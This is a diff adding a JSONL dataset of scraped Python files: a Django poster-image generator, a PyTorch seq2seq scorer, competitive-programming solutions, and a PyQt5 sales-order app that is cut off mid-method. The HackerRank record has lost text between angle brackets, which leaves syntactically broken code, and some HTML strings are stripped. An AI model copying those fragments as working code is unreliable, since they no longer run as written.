diff --git "a/4710.jsonl" "b/4710.jsonl" new file mode 100644--- /dev/null +++ "b/4710.jsonl" @@ -0,0 +1,1436 @@ +{"seq_id":"38872048138","text":"from api.models import Post, Comment\nfrom PIL import Image, ImageDraw, ImageFont\nfrom django.conf import settings\nfrom django.core.files.base import ContentFile\nfrom io import BytesIO\nfrom django.core.files.uploadedfile import InMemoryUploadedFile\n\n\nclass ImageSerivce():\n def __init__(self):\n self.font_path = f'{settings.MEDIA_ROOT}/fonts/NewBaskervilleITCbyBT-Roman.otf'\n self.default_width_multiplier = 1.1 # generated image width\n self.default_height_multiplier = 1.25 # generated image height\n self.border_multiplier = 1.02 # how much bigger the border will be than the image\n self.primary_font_scale = 0.08 # font scale in relation to image height\n self.bottom_font_scale = 0.04 # bottom text font scale in relation to image height\n\n def generate_post_image(self, post: Post):\n image = self._generate_image(post.image_file, post.primary_text,\n post.bottom_text)\n return self._convert_to_django_img(image)\n\n def generate_comment_image(self, comment: Comment):\n if comment.parent is None:\n image_file = f\"{settings.MEDIA_ROOT}/posts/{comment.post.id}/generated.png\"\n else:\n image_file = f\"{settings.MEDIA_ROOT}/posts/{comment.post.id}/comment_{comment.parent.id}.png\"\n image = self._generate_image(image_file, comment.primary_text,\n comment.bottom_text)\n return self._convert_to_django_img(image)\n\n def _convert_to_django_img(self, image):\n buffer = BytesIO()\n image.save(fp=buffer, format='PNG')\n pillow_image = ContentFile(buffer.getvalue())\n return InMemoryUploadedFile(\n pillow_image, # file\n None, # field_name\n 'image.png', # file name\n 'image/jpeg', # content_type\n pillow_image.tell, # size\n None) # content_type_extra)\n\n def _get_image_width_multiplier(self, bottom_text: int,\n original_width: int):\n \"\"\"\n Get image width multiplier so that bottom text would fit\n \"\"\"\n return max(\n len(bottom_text) / (original_width / 10),\n self.default_width_multiplier)\n\n def _generate_image(self, previous_image: str, primary_text: str,\n bottom_text: str):\n \"\"\"\n Lord have mercy\n \"\"\"\n pil_image = Image.open(previous_image)\n orig_size = pil_image.size\n\n # create black base\n new_width_multiplier = self._get_image_width_multiplier(\n bottom_text, orig_size[0])\n final_img_size = (int(new_width_multiplier * orig_size[0]),\n int(self.default_height_multiplier * orig_size[1]))\n final_img = Image.new(\"RGB\", final_img_size)\n\n # create white border\n border_size = tuple(\n [int(x * self.border_multiplier) for x in orig_size])\n border_x = int((final_img_size[0] - border_size[0]) / 2)\n y_coord = (int(self.default_width_multiplier * orig_size[0]) -\n border_size[0]) // 2 # border starting y coordinate\n border_coords = [(border_x, y_coord),\n (border_x + border_size[0], y_coord + border_size[1])]\n final_img_draw = ImageDraw.Draw(final_img)\n final_img_draw.rectangle(border_coords, fill=\"#000\", outline=\"#fff\")\n\n # insert original image\n center_x = (final_img_size[0] - orig_size[0]) // 2\n y_coord = (int(self.default_width_multiplier * orig_size[0]) -\n orig_size[0]) // 2 # original image starting y coordinate\n final_img.paste(pil_image, (center_x, y_coord))\n\n font_size = int(self.primary_font_scale * orig_size[1])\n font = ImageFont.truetype(self.font_path, font_size)\n\n # insert primary text\n text_size = final_img_draw.textsize(primary_text.upper(), font=font)\n final_img_draw.text(\n ((final_img_size[0] - text_size[0]) / 2, border_size[1] + y_coord),\n primary_text.upper(), (255, 255, 255),\n font=font)\n\n # insert bottom text\n bottom_font_size = int(self.bottom_font_scale * orig_size[1])\n bottom_font = ImageFont.truetype(self.font_path, bottom_font_size)\n subtext_size = final_img_draw.textsize(bottom_text, font=bottom_font)\n final_img_draw.text(\n ((final_img_size[0] - subtext_size[0]) / 2,\n border_size[1] + y_coord + text_size[1] + subtext_size[1]),\n bottom_text, (255, 255, 255),\n font=bottom_font)\n\n return final_img\n","repo_name":"kristalacka/demotivational-thread-site","sub_path":"demotivation/api/services/image_service.py","file_name":"image_service.py","file_ext":"py","file_size_in_byte":4640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16392277553","text":"import os\nimport numpy as np\nimport torch\nimport torch.nn as nn\nfrom data import DatasetBlock, DatasetBlocksp\nfrom model import Transformer\nfrom trainer import Seq2SeqTrainer\nimport options\nfrom torch.utils.data import DataLoader, DistributedSampler, RandomSampler\nfrom torch import distributed\nfrom torch.utils.tensorboard import SummaryWriter\nimport matplotlib.pyplot as pl\nfrom tqdm import tqdm\nimport pandas as pd\n\n\ndef load_dataset(args):\n if args.task == 'block':\n print(\"Loading Test Dataset\", args.test_dataset)\n test_dataset = DatasetBlock(args.test_dataset, seq_len=args.seq_len)\n elif args.task == 'blocksp':\n print(\"Loading Test Dataset\", args.test_dataset)\n test_dataset = DatasetBlocksp(args.test_dataset, seq_len=args.seq_len)\n else:\n raise ValueError('unknown task name')\n\n return test_dataset\n\n\nparser = options.get_training_parser()\nargs = options.parse_args_and_arch(parser)\n\nif args.multi_node:\n distributed.init_process_group(\n backend=args.backend,\n init_method='env://'\n # world_size=args.world_size,\n # rank=args.rank,\n )\n\n# GPU mode: 0 - 1 gpu, 1 -- 1 Node, 2 -- multi Nodes\ngpu_mode = 1\ncuda_device_id = 0\nif distributed.is_available():\n if distributed.is_initialized():\n gpu_mode = 2\n cuda_device_id = args.local_rank\nelif not torch.cuda.is_available():\n gpu_mode = 0\n\n# Setup cuda device\nif gpu_mode == 2:\n torch.cuda.set_device(cuda_device_id)\n device = torch.device(f\"cuda:{cuda_device_id}\")\nelif (gpu_mode == 1) & torch.cuda.is_available():\n device = torch.device(\"cuda:0\")\nelse:\n device = torch.device(\"cpu\")\n\ntest_dataset = load_dataset(args)\n\ntest_data_loader = DataLoader(test_dataset, batch_size=args.batch_size, num_workers=args.num_workers)\n\n# build model\nprint(\"Building BERT model\")\n# Initialize the BERT Language Model, with BERT model\nmodel = Transformer(len(test_dataset.vocab),\n hidden=args.hidden, n_layers=args.layers, attn_heads=args.attn_heads)\n\nif args.restart:\n print(\"reload pretrained BERT model\")\n model.load_state_dict(torch.load(args.restart_file, map_location=torch.device('cpu')))\n\nmodel.to(device)\n\n# Distributed GPU training if CUDA can detect more than 1 GPU\nif gpu_mode == 2:\n print(f\"Using GPU {cuda_device_id}\")\n model = nn.parallel.DistributedDataParallel(model,\n device_ids=[cuda_device_id],\n output_device=cuda_device_id,\n find_unused_parameters=True)\nelif (gpu_mode == 1) and (torch.cuda.device_count() > 1):\n print(\"Using %d GPUS for BERT\" % torch.cuda.device_count())\n model = nn.DataParallel(model)\n\nmodel.eval()\n\ntorch.set_grad_enabled(False)\n\n\ntotal_correct = 0\ntotal_element = 0\nlen_data_loader = len(test_data_loader)\n\nloss_fn = nn.NLLLoss(ignore_index=0, reduction='none')\n\nscore_all = []\nloss_all = []\n\ndf = pd.read_csv('data/blosum62_array.csv', dtype=np.float32)\n# vocab = 23, pad_index = 0, 2 other indexes\nsubmat = df.values\nsubmat = np.pad(submat, ((1, 2), (1, 2)), 'constant', constant_values=0)\n\nfor i, data in tqdm(enumerate(test_data_loader)):\n data = {key: value.to(device) for key, value in data.items()}\n\n seq_output = model.forward(data[\"src\"], data[\"tgt_x\"])\n\n # NLLLoss of predicting masked token word\n # (N, T, E) --> (N, E, T)\n\n loss = loss_fn(seq_output.transpose(1, 2), data[\"tgt_y\"])\n\n # masked token prediction accuracy\n idx = (data[\"tgt_y\"] > 0)\n # print(mask_lm_output.transpose(1, 2).argmax(dim=1)[idx])\n # print(mask_lm_output.transpose(1, 2).argmax(dim=1)[idx].eq(data[\"bert_label\"][idx]))\n correct = seq_output.transpose(1, 2).argmax(dim=1)[idx].eq(data[\"tgt_y\"][idx]).sum().item()\n batch_n_element = data[\"tgt_y\"][idx].nelement()\n total_correct += correct\n total_element += batch_n_element\n\n print(f'Accuracy/test: {100.0 * correct / batch_n_element}')\n\n total_correct += correct\n total_element += batch_n_element\n\n seq_output = seq_output.detach().cpu().transpose(1, 2).argmax(dim=1).numpy()\n seq_target = data[\"tgt_y\"].cpu().numpy()\n # score = np.zeros_like(seq_target)\n # for j in range(seq_target.shape[0]):\n # for k in range(seq_target.shape[1]):\n # score[j, k] = submat[seq_output[j, k], seq_target[j, k]]\n score = submat[seq_target, seq_output].sum(axis=1)\n # print(score)\n # print(loss)\n\n score_all.extend(list(score))\n loss_all.extend(loss.detach().cpu().numpy().sum(axis=1))\n\n\nprint(f\"total_acc= {total_correct * 100.0 / total_element}\")\n\ndf2 = pd.DataFrame({'score': score_all, 'loss': loss_all})\ndf2.to_csv('data/seq_split_interdm_pred.csv', index=False)\n\n\n\n\n\n\n","repo_name":"lahplover/unippi","sub_path":"seq2seq_scorer.py","file_name":"seq2seq_scorer.py","file_ext":"py","file_size_in_byte":4761,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"19688845694","text":"# ABC-249 B - Counterclockwise Rotation\r\n# https://atcoder.jp/contests/abc259/tasks/abc259_b\r\n#\r\nimport math\r\n\r\n\r\ndef getIntMap():\r\n return map(int, input().split())\r\n\r\n\r\ndef main():\r\n a, b, d = getIntMap()\r\n\r\n r = math.radians(d)\r\n\r\n x = a * math.cos(r) - b * math.sin(r)\r\n y = a * math.sin(r) + b * math.cos(r)\r\n\r\n print(x, y)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"hyperdb/AtCoderPy","sub_path":"ABC/201-300/251-260/ABC-259-B.py","file_name":"ABC-259-B.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23201700554","text":"if __name__ == '__main__':\n n = int(input())\n arr = list( map(int, input().split()))\n arr.sort(reverse=True)\n for i in arr:\n if(i m2:\n m2 = arr[i]\n print m2\nfrom collections import Counter\nif __name__ == '__main__':\n n = int(raw_input())\n arr = Counter(map(int, raw_input().split())).keys()\n arr.sort()\n print arr[-2]\nfrom collections import Counter\nif __name__ == '__main__':\n n = int(raw_input())\n arr = list(set(map(int, raw_input().split())))\n arr.sort()\n print arr[-2]\n\"\"\"\n","repo_name":"laziestcoder/Python_HR_Codes","sub_path":"2 Basic Data Types/Find the Runner-Up Score!.py","file_name":"Find the Runner-Up Score!.py","file_ext":"py","file_size_in_byte":1375,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"9557902192","text":"import datetime\nimport sys\n\nfrom PyQt5.QtCore import QTimer, Qt, QThread, pyqtSlot\nfrom PyQt5.QtGui import QPixmap\nfrom PyQt5.QtWidgets import QApplication, QMainWindow, QMessageBox, QSplashScreen, QTreeWidgetItem\n\nfrom configuration import config, configfn\nfrom dialogs.csv_import_dialog import CsvFileImportDialog\nfrom dialogs.http_customers_dialog import GetCustomersHttpDialog\nfrom dialogs.http_products_dialog import GetProductsHttpDialog\nfrom dialogs.create_report_dialog import ReportDialogCreate\nfrom dialogs.settings_dialog import SettingsDialog\nfrom dialogs.visit_dialog import VisitDialog\nfrom models.contact import Contact\nfrom models.customer import Customer\nfrom models.orderline import OrderLine\nfrom models.employee import Employee\nfrom models.product import Product\nfrom models.report import Report\nfrom models.settings import Settings\nfrom models.visit import Visit\nfrom resources.main_window_rc import Ui_mainWindow\nfrom resources import splash_rc\nfrom util import utils\nfrom util.rules import check_settings\n\n__appname__ = \"Eordre NG\"\n__module__ = \"main.py\"\n\n\nclass MainWindow(QMainWindow, Ui_mainWindow):\n \"\"\"\n Main Application Window\n \"\"\"\n\n def __init__(self, parent=None):\n \"\"\"\n Initialize MainWindow class\n \"\"\"\n super(MainWindow, self).__init__(parent)\n self.setupUi(self)\n QThread.currentThread().setObjectName(__appname__)\n configfn.check_config_folder() # Check appdata folder in users home\n\n self.txtWorkdate.setText(datetime.date.today().isoformat()) # initialize workdate to current date\n self._contacts = Contact() # Initialize Contact object\n self._customers = Customer() # Initialize Customer object\n self._orderlines = OrderLine() # Initialize Detail object\n self._employees = Employee() # Initialize Employee object\n self._products = Product() # Initialize Product object\n self._reports = Report() # Initialize Report object\n self._visits = Visit() # Initialize Visit object\n self._settings = Settings() # Initialize Settings object\n\n # # connect menu trigger signals\n # self.actionAboutQt.triggered.connect(self.show_about_qt)\n # self.actionAboutSoftware.triggered.connect(self.show_about_software)\n # self.actionArchiveChanges.triggered.connect(self.archive_customer)\n # self.actionContactsInfo.triggered.connect(self.show_contact_data_page)\n # self.actionCreateCustomer.triggered.connect(self.create_customer)\n # self.actionCreateVisit.triggered.connect(self.show_visit_dialog)\n # self.actionImportCsvFiles.triggered.connect(self.show_csv_import_dialog)\n # self.actionExit.triggered.connect(self.app_exit_slot)\n # self.actionGetCatalogHttp.triggered.connect(self.show_http_products_dialog)\n # self.actionGetCustomersHttp.triggered.connect(self.show_http_customers_dialog)\n # self.actionMasterInfo.triggered.connect(self.show_master_data_page)\n # self.actionReport.triggered.connect(self.show_create_report_dialog)\n # self.actionReportList.triggered.connect(self.show_reports_dialog)\n # self.actionSettings.triggered.connect(self.show_settings_dialog)\n # self.actionVisitsInfo.triggered.connect(self.show_visit_data_page)\n # self.actionZeroDatabase.triggered.connect(self.zero_database)\n # # buttons on top\n # self.btnAddCustomer.clicked.connect(self.create_customer)\n # self.btnCreateReportDialog.clicked.connect(self.show_create_report_dialog)\n # # buttons for paging data\n # self.btnShowContacts.clicked.connect(self.show_contact_data_page)\n # self.btnShowMasterdata.clicked.connect(self.show_master_data_page)\n # self.btnShowVisits.clicked.connect(self.show_visit_data_page)\n # # button on master data page\n # self.btnArchiveMasterdata.clicked.connect(self.archive_customer)\n # # buttons on contacts data page\n # self.btnArchiveContacts.clicked.connect(self.archive_contacts_slot)\n # self.btnAddContact.clicked.connect(self.add_contact_slot)\n # # button visit data page\n # self.btnVisitDialog.clicked.connect(self.show_visit_dialog)\n # # connect list changes\n # self.widgetCustomerList.currentItemChanged.connect(self.on_customer_changed)\n # self.widgetVisitList.currentItemChanged.connect(self.on_visit_changed)\n # # Hide the id column on visit list\n # self.widgetVisitList.setColumnHidden(0, True)\n # # Set header on visit details\n # self.widgetVisitDetails.setColumnWidth(0, 30)\n # self.widgetVisitDetails.setColumnWidth(1, 30)\n # self.widgetVisitDetails.setColumnWidth(2, 100)\n # self.widgetVisitDetails.setColumnWidth(3, 150)\n # self.widgetVisitDetails.setColumnWidth(4, 60)\n # self.widgetVisitDetails.setColumnWidth(5, 40)\n # load report for workdate if exist\n self._reports.load_report(self.txtWorkdate.text())\n # display customerlist\n self.populate_customer_list()\n # set latest customer active\n if self._customers.lookup_by_id(self._settings.setting[\"cust_idx\"]):\n try:\n phone = self._customers.customer[\"phone1\"]\n self.widgetCustomerList.setCurrentIndex(\n self.widgetCustomerList.indexFromItem(\n self.widgetCustomerList.findItems(phone, Qt.MatchExactly, column=0)[0]))\n except KeyError:\n pass\n # set last info page used\n if self._settings.setting[\"page_idx\"]:\n self.widgetCustomerInfo.setCurrentIndex(self._settings.setting[\"page_idx\"])\n\n def closeEvent(self, event):\n \"\"\"\n Slot for close event signal\n Args:\n event:\n\n intended use is warning about unsaved data\n \"\"\"\n # TODO handle close event\n self.app_exit_slot()\n pass\n\n @pyqtSlot(name=\"app_exit_slot\")\n def app_exit_slot(self):\n \"\"\"\n Slot for exit triggered signal\n \"\"\"\n # customer id\n try:\n self._settings.setting[\"cust_idx\"] = self._customers.customer[\"customer_id\"]\n except KeyError:\n self._settings.setting[\"cust_idx\"] = 0\n # customer info page\n if not self._settings.setting[\"page_idx\"]:\n self._settings.setting[\"page_idx\"] = self.widgetCustomerInfo.currentIndex()\n # save setttings\n self._settings.update()\n app.quit()\n\n def display_sync_status(self):\n \"\"\"\n Update status fields\n \"\"\"\n self.txtCustLocal.setText(self._settings.setting[\"lsc\"])\n self.txtCustServer.setText(self._settings.setting[\"sac\"])\n self.txtProdLocal.setText(self._settings.setting[\"lsp\"])\n self.txtProdServer.setText(self._settings.setting[\"sap\"])\n\n def populate_contact_list(self):\n \"\"\"\n Populate the contactlist based on currently selected customer\n \"\"\"\n # load contacts\n self.widgetContactList.clear()\n items = []\n try:\n self._contacts.list_ = self._customers.customer[\"customer_id\"]\n for c in self._contacts.list_:\n item = QTreeWidgetItem([c[\"name\"],\n c[\"department\"],\n c[\"phone\"],\n c[\"email\"]])\n items.append(item)\n except IndexError:\n pass\n except KeyError:\n pass\n\n self.widgetContactList.addTopLevelItems(items)\n\n def populate_customer_list(self):\n \"\"\"\n Populate customer list\n \"\"\"\n self.widgetCustomerList.clear() # shake the tree for leaves\n self.widgetCustomerList.setColumnCount(4) # set columns\n self.widgetCustomerList.setHeaderLabels([\"Telefon\", \"Firma\", \"Post\", \"Bynavn\"])\n items = [] # temporary list\n try:\n for c in self._customers.list_:\n item = QTreeWidgetItem([c[\"phone1\"], c[\"company\"], c[\"zipcode\"], c[\"city\"]])\n items.append(item)\n except (IndexError, KeyError):\n pass\n # assign Widgets to Tree\n self.widgetCustomerList.addTopLevelItems(items)\n self.widgetCustomerList.setSortingEnabled(True) # enable sorting\n\n def populate_visit_details_list(self):\n \"\"\"\n Populate the details list based on the line visit\n \"\"\"\n self.widgetVisitDetails.clear()\n self.txtPoNumber.setText(\"\")\n self.txtSas.setText(\"\")\n self.txtSale.setText(\"\")\n self.txtTotal.setText(\"\")\n self.lblApproved.setText(\"\")\n self.lblSent.setText(\"\")\n self.txtVisitInfoText.setText(\"\")\n\n items = []\n try:\n self._orderlines.list_ = self._visits.visit[\"visit_id\"]\n\n self.txtPoNumber.setText(self._visits.visit[\"po_number\"])\n self.txtSas.setText(str(self._visits.visit[\"po_sas\"]))\n self.txtSale.setText(str(self._visits.visit[\"po_sale\"]))\n self.txtTotal.setText(str(self._visits.visit[\"po_total\"]))\n self.lblSent.setText(utils.bool2dk(utils.int2bool(self._visits.visit[\"po_sent\"])))\n self.lblApproved.setText(utils.bool2dk(utils.int2bool(self._visits.visit[\"po_approved\"])))\n self.txtVisitInfoText.setText(self._visits.visit[\"po_note\"])\n\n for detail in self._orderlines.list_:\n item = QTreeWidgetItem([detail[\"linetype\"],\n str(detail[\"pcs\"]),\n detail[\"sku\"],\n detail[\"text\"],\n str(detail[\"price\"]),\n str(detail[\"discount\"]),\n detail[\"extra\"]])\n items.append(item)\n except KeyError:\n pass\n except IndexError:\n pass\n self.widgetVisitDetails.addTopLevelItems(items)\n\n def populate_visit_list(self):\n \"\"\"\n Populate the visitlist based on the active customer\n \"\"\"\n # populate visit list table\n self.widgetVisitList.clear()\n # self.widgetVisitList.setColumnCount(5)\n self.widgetVisitList.setHeaderLabels([\"Id\", \"Dato\", \"Navn\", \"Demo\", \"Salg\"])\n self.widgetVisitList.setColumnWidth(0, 0)\n items = []\n try:\n self._visits.list_customer = self._customers.customer[\"customer_id\"]\n for visit in self._visits.list_customer:\n item = QTreeWidgetItem([str(visit[\"visit_id\"]),\n visit[\"visit_date\"],\n visit[\"po_buyer\"],\n visit[\"prod_demo\"],\n visit[\"prod_sale\"]])\n items.append(item)\n except IndexError:\n pass\n except KeyError:\n pass\n self.widgetVisitList.addTopLevelItems(items)\n\n def resizeEvent(self, event):\n \"\"\"\n Slot for the resize event signal\n Args:\n event:\n intended use is resize content to window\n :param event:\n \"\"\"\n # TODO handle resize event\n pass\n\n def run(self):\n \"\"\"\n Setup database and basic configuration\n \"\"\"\n # basic settings must be done\n is_set = check_settings(self._settings.setting)\n if is_set:\n try:\n _ = self._employees.employee[\"fullname\"]\n except KeyError:\n msgbox = QMessageBox()\n msgbox.about(self,\n __appname__,\n \"Der er en fejl i dine indstillinger.\\nKontroller dem venligst.\\nTak.\")\n else:\n msgbox = QMessageBox()\n msgbox.about(self,\n __appname__,\n \"App'en skal bruge nogle oplysninger.\\nRing kontoret hvis du er i tvivl.\\nTak.\")\n\n self.show_settings_dialog()\n\n # if requested check server data\n if utils.int2bool(self._settings.setting[\"sc\"]):\n # update sync status\n status = utils.refresh_sync_status(self._settings)\n self._settings.setting[\"sac\"] = status[0][1].split()[0]\n self._settings.setting[\"sap\"] = status[1][1].split()[0]\n self._settings.update()\n\n # display known sync data\n self.display_sync_status()\n\n @pyqtSlot(name=\"add_contact_slot\")\n def add_contact_slot(self):\n \"\"\"\n Save changes made to contacts\n \"\"\"\n # TODO add new contact\n msgbox = QMessageBox()\n msgbox.information(self,\n __appname__,\n \"# TODO add new contact\",\n QMessageBox.Ok)\n\n @pyqtSlot(name=\"archive_contacts_slot\")\n def archive_contacts_slot(self):\n \"\"\"\n Save changes made to contacts\n \"\"\"\n # TODO save changes made to contacts\n msgbox = QMessageBox()\n msgbox.information(self,\n __appname__,\n \"# TODO save changes made to contacts\",\n QMessageBox.Ok)\n\n @pyqtSlot(name=\"archive_customer\")\n def archive_customer(self):\n \"\"\"\n Slot for updateCustomer triggered signal\n \"\"\"\n if not self._customers.customer:\n # msgbox triggered if no current is selected\n msgbox = QMessageBox()\n msgbox.information(self,\n __appname__,\n \"Det kan jeg ikke på nuværende tidspunkt!\",\n QMessageBox.Ok)\n return False\n # assign input field values to current object\n self._customers.customer[\"company\"] = self.txtCompany.text()\n self._customers.customer[\"address1\"] = self.txtAddress1.text()\n self._customers.customer[\"address2\"] = self.txtAddress2.text()\n self._customers.customer[\"zipcode\"] = self.txtZipCode.text()\n self._customers.customer[\"city\"] = self.txtCityName.text()\n self._customers.customer[\"phone1\"] = self.txtPhone1.text()\n self._customers.customer[\"phone2\"] = self.txtPhone2.text()\n self._customers.customer[\"email\"] = self.txtEmail.text()\n self._customers.customer[\"factor\"] = self.txtFactor.text()\n self._customers.customer[\"infotext\"] = self.txtCustomerInfoText.toPlainText()\n self._customers.customer[\"modified\"] = 1\n self._customers.update()\n\n @pyqtSlot(name=\"create_customer\")\n def create_customer(self):\n \"\"\"\n Slot for createCustomer triggered signal\n \"\"\"\n if not self.txtNewCompany.text() or not self.txtNewPhone1.text():\n msgbox = QMessageBox()\n msgbox.information(self,\n __appname__,\n \"Snap - Jeg mangler:\\n Firma navn \\n Telefon nummer\",\n QMessageBox.Ok)\n else:\n msgbox = QMessageBox()\n msgbox.information(self,\n __appname__,\n \"Gem kunde til database\\n\\n\" +\n self.txtNewCompany.text() + \"\\n\" +\n self.txtNewPhone1.text(),\n QMessageBox.Ok)\n\n @pyqtSlot(QTreeWidgetItem, QTreeWidgetItem, name=\"on_customer_changed\")\n def on_customer_changed(self, current, previous):\n \"\"\"\n Slot for treewidget current item changed signal\n Used to respond to changes in the currently selected current\n and update the related current info pages\n\n Args:\n current: currently selected item\n previous: previous selected item\n \"\"\"\n try:\n phone = current.text(0)\n company = current.text(1)\n # move current customer\n # load customer\n self._customers.lookup(phone, company)\n # fields to line edits\n self.txtAccount.setText(self._customers.customer[\"account\"])\n self.txtCompany.setText(self._customers.customer[\"company\"])\n self.txtAddress1.setText(self._customers.customer[\"address1\"])\n self.txtAddress2.setText(self._customers.customer[\"address2\"])\n self.txtZipCode.setText(self._customers.customer[\"zipcode\"])\n self.txtCityName.setText(self._customers.customer[\"city\"])\n self.txtPhone1.setText(self._customers.customer[\"phone1\"])\n self.txtPhone2.setText(self._customers.customer[\"phone2\"])\n self.txtEmail.setText(self._customers.customer[\"email\"])\n self.txtFactor.setText(str(self._customers.customer[\"factor\"]))\n self.txtCustomerInfoText.setText(self._customers.customer[\"infotext\"])\n except AttributeError:\n pass\n except KeyError:\n pass\n # load customer infos\n self.populate_contact_list()\n self.populate_visit_list()\n self.populate_visit_details_list()\n\n @pyqtSlot(name=\"on_csv_import_done\")\n def on_csv_import_done(self):\n \"\"\"\n Slog for csv import done signal\n \"\"\"\n self.populate_customer_list()\n\n @pyqtSlot(name=\"on_customers_done\")\n def on_customers_done(self):\n \"\"\"\n Slot for getCustomers finished signal\n \"\"\"\n self.populate_customer_list()\n lsc = datetime.date.today().isoformat()\n self.txtCustLocal.setText(lsc)\n self._settings.setting[\"lsc\"] = lsc\n self._settings.update()\n\n @pyqtSlot(name=\"on_products_done\")\n def on_products_done(self):\n \"\"\"\n Slot for getProducts finished signal\n \"\"\"\n self._products.all()\n lsp = datetime.date.today().isoformat()\n self.txtProdLocal.setText(lsp)\n self._settings.setting[\"lsp\"] = lsp\n self._settings.update()\n\n @pyqtSlot(name=\"on_settings_changed\")\n def on_settings_changed(self):\n \"\"\"\n load employee data\n :return:\n \"\"\"\n self._settings.load()\n self._employees.load(self._settings.setting[\"usermail\"])\n\n @pyqtSlot(QTreeWidgetItem, QTreeWidgetItem, name=\"on_visit_changed\")\n def on_visit_changed(self, current, previous):\n \"\"\"\n Response to current visit changed\n Args:\n current:\n previous:\n \"\"\"\n try:\n self._visits.visit = current.text(0)\n except AttributeError:\n pass\n except KeyError:\n pass\n self.populate_visit_details_list()\n\n @pyqtSlot(name=\"data_export\")\n def data_export(self):\n \"\"\"\n Slot for dataExport triggered signal\n \"\"\"\n # TODO: Opret CSV data backup\n msgbox = QMessageBox()\n msgbox.information(self,\n __appname__,\n \"TODO: Opret CSV data backup\",\n QMessageBox.Ok)\n\n @pyqtSlot(name=\"show_about_qt\")\n def show_about_qt(self):\n \"\"\"\n Slot for aboutQt triggered signal\n \"\"\"\n msgbox = QMessageBox()\n msgbox.aboutQt(self, __appname__)\n\n @pyqtSlot(name=\"show_about_software\")\n def show_about_software(self):\n \"\"\"\n Slot for aboutSoftware triggered signal\n \"\"\"\n msgbox = QMessageBox()\n msgbox.about(self, __appname__,\n \"Bygget med Python 3.6 og Qt5

Frede Hundewadt (c) 2017

\"\n \"https://www.gnu.org/licenses/agpl.html\")\n\n @pyqtSlot(name=\"show_contact_data_page\")\n def show_contact_data_page(self):\n \"\"\"\n Slot for contactData triggered signal\n \"\"\"\n self.widgetCustomerInfo.setCurrentIndex(1)\n\n @pyqtSlot(name=\"show_create_report_dialog\")\n def show_create_report_dialog(self):\n \"\"\"\n Slot for Report triggered signal\n \"\"\"\n try:\n # check the report date\n # no report triggers KeyError which in turn launches the CreateReportDialog\n repdate = self._reports.report[\"rep_date\"]\n if not repdate == self.txtWorkdate.text():\n # if active report is not the same replace it with workdate\n self._reports.load_report(self.txtWorkdate.text())\n # trigger a KeyError if no report is current which launches the CreateReportDialog\n repdate = self._reports.report[\"rep_date\"]\n # check if the report is sent\n if self._reports.report[\"sent\"] == 1:\n # we do not allow visits to be created on a report which is closed\n self.buttonCreateVisit.setEnabled(False)\n else:\n self.buttonCreateVisit.setEnabled(True)\n infotext = \"Rapport aktiv for: {}\".format(repdate)\n msgbox = QMessageBox()\n msgbox.information(self, __appname__, infotext, QMessageBox.Ok)\n return True\n\n except KeyError:\n # Show report dialog\n create_report_dialog = ReportDialogCreate(self.txtWorkdate.text())\n if create_report_dialog.exec_():\n # user chosed to create a report\n self.txtWorkdate.setText(create_report_dialog.workdate)\n # try load a report for that date\n self._reports.load_report(self.txtWorkdate.text())\n try:\n # did the user choose an existing report\n _ = self._reports.report[\"rep_date\"]\n infotext = \"Eksisterende rapport hentet: {}\".format(self.txtWorkdate.text())\n except KeyError:\n # create the report\n self._reports.create(self._employees.employee, self.txtWorkdate.text())\n infotext = \"Rapport oprettet for: {}\".format(self.txtWorkdate.text())\n msgbox = QMessageBox()\n msgbox.information(self, __appname__, infotext, QMessageBox.Ok)\n return True\n else:\n msgbox = QMessageBox()\n msgbox.information(self,\n __appname__,\n \"Den aktive rapport er IKKE ændret!\",\n QMessageBox.Ok)\n return False\n\n @pyqtSlot(name=\"shoq_csv_import_dialog\")\n def show_csv_import_dialog(self):\n \"\"\"\n Slot for fileImport triggered signal\n \"\"\"\n if self._customers.list_:\n msgbox = QMessageBox()\n msgbox.warning(self,\n __appname__,\n \"Ved import slettes alle eksisterende data!

\"\n \"Det er alt eller intet af hensyn til datas sammenhæng.
\"\n \"Du SKAL importere ALLE tabeller fra listen!

\"\n \"Gør du ikke det giver det uløselige problemer!\",\n QMessageBox.Ok)\n # app, contact, customer, detail, employee, report, visit, tables\n import_dialog = CsvFileImportDialog(app, contacts=self._contacts, customers=self._customers,\n employees=self._employees, orderlines=self._orderlines,\n reports=self._reports, tables=config.CSV_TABLES, visits=self._visits)\n import_dialog.sig_done.connect(self.on_csv_import_done)\n import_dialog.exec_()\n\n @pyqtSlot(name=\"show_http_customers_dialog\")\n def show_http_customers_dialog(self):\n \"\"\"\n Slot for getCustomers triggered signal\n \"\"\"\n import_customers = GetCustomersHttpDialog(app,\n customers=self._customers,\n employees=self._employees,\n settings=self._settings)\n import_customers.sig_done.connect(self.on_customers_done)\n import_customers.exec_()\n\n @pyqtSlot(name=\"show_http_products_dialog\")\n def show_http_products_dialog(self):\n \"\"\"\n Slot for getProducts triggered signal\n \"\"\"\n import_product = GetProductsHttpDialog(app,\n products=self._products,\n settings=self._settings)\n import_product.sig_done.connect(self.on_products_done)\n import_product.exec_()\n\n @pyqtSlot(name=\"show_visit_data_page\")\n def show_visit_data_page(self):\n \"\"\"\n Slot for visitData triggered signal\n \"\"\"\n self.widgetCustomerInfo.setCurrentIndex(2)\n\n @pyqtSlot(name=\"show_master_data_page\")\n def show_master_data_page(self):\n \"\"\"\n Slot for masterData triggered signal\n \"\"\"\n self.widgetCustomerInfo.setCurrentIndex(0)\n\n @pyqtSlot(name=\"show_reports_dialog\")\n def show_reports_dialog(self):\n \"\"\"\n Slot for Report List triggered signal\n \"\"\"\n pass\n\n @pyqtSlot(name=\"show_settings_dialog\")\n def show_settings_dialog(self):\n \"\"\"\n Slot for settingsDialog triggered signal\n \"\"\"\n settings_dialog = SettingsDialog(self._settings, self._employees)\n settings_dialog.settings_changed.connect(self.on_settings_changed)\n settings_dialog.exec_()\n\n @pyqtSlot(name=\"show_visit_dialog\")\n def show_visit_dialog(self):\n \"\"\"\n Slot for launching the visit dialog\n \"\"\"\n try:\n # do we have a report\n _ = self._reports.report[\"rep_date\"]\n active_report = True\n except KeyError:\n 